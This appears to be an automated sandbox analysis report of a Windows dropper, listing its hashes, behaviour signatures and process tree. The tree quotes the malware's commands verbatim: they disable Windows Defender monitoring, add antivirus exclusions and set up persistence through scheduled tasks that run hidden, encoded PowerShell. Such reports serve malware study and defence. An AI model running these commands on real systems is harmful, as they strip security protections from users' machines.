Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05/10/2022, 03:02

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    1a2acd7c45d937ad3785220922543b09

  • SHA1

    40d99901e46e1397c8e2dcd65dd49d438e2c597e

  • SHA256

    e3d3c44e137161d9cdaa90d7ddc11e93d6503f0b5c379aa5a8c5a94964bb38dd

  • SHA512

    5d9ebcd2613aeb33eeff7660cdf30b01be22094ab98d26c36065d859afc82f4c82045c168136087c135035c72b4e221bfa8a9ecc6c94bcf0bbf2a77066f47364

  • SSDEEP

    196608:91OjRq12f9hGsxoXImK8GpJ+kI56Gs2BORKL0I:3O9AsJk2JMkI56GVORKL0I

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 22 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Users\Admin\AppData\Local\Temp\7zSFC69.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Users\Admin\AppData\Local\Temp\7zSFFD3.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:980
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:568
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1664
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1160
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1604
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1256
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1612
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gNZWjVRxG" /SC once /ST 01:44:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1960
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gNZWjVRxG"
                  4⤵
                    PID:1968
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gNZWjVRxG"
                    4⤵
                      PID:468
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bpCIAYFeZyKMHikKBh" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exe\" ux /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:820
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3F999AEA-19B0-46D8-A4A8-722F3C6E671B} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
                1⤵
                  PID:1472
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2012
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:316
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1616
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:1948
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:628
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:832
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1336
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1732
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:1592
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {E99E9629-388A-43D7-81B4-667DD79BA960} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:1972
                              • C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exe
                                C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exe ux /site_id 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:580
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gpRnAviez" /SC once /ST 01:09:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1336
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gpRnAviez"
                                  3⤵
                                    PID:1232
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gpRnAviez"
                                    3⤵
                                      PID:1656
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:1832
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:1860
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:1348
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:664
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gyponfdkf" /SC once /ST 04:07:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:1480
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gyponfdkf"
                                          3⤵
                                            PID:820
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gyponfdkf"
                                            3⤵
                                              PID:1600
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:1540
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1580
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:1628
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1688
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:1368
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1012
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1040
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\knLrxBGDCryPZEWZ\HXVTocvF\GobPbQyIMvSRcjBB.wsf"
                                                          3⤵
                                                            PID:1212
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\knLrxBGDCryPZEWZ\HXVTocvF\GobPbQyIMvSRcjBB.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:1260
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1164
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:576
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1052
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1336
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1980
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2008
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1732
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:272
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1816
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:840
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1748
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1588
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1832
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:468
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1112
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:596
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:972
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:628
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:1940
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:1616
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1936
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:1836
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1736
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:908
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:520
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:1304
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:1696
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:664
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:1212
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:1964
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:1240
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:1256
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gfeubKHGm" /SC once /ST 00:26:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:972
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gfeubKHGm"
                                                                                            3⤵
                                                                                              PID:1052
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gfeubKHGm"
                                                                                              3⤵
                                                                                                PID:1816
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                3⤵
                                                                                                  PID:1600
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                    4⤵
                                                                                                      PID:1656
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                    3⤵
                                                                                                      PID:1592
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                        4⤵
                                                                                                          PID:1544
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "sowxjEWsCulfsCpcT" /SC once /ST 03:27:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exe\" oy /site_id 525403 /S" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:1624
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "sowxjEWsCulfsCpcT"
                                                                                                        3⤵
                                                                                                          PID:1628
                                                                                                      • C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exe
                                                                                                        C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exe oy /site_id 525403 /S
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks computer location settings
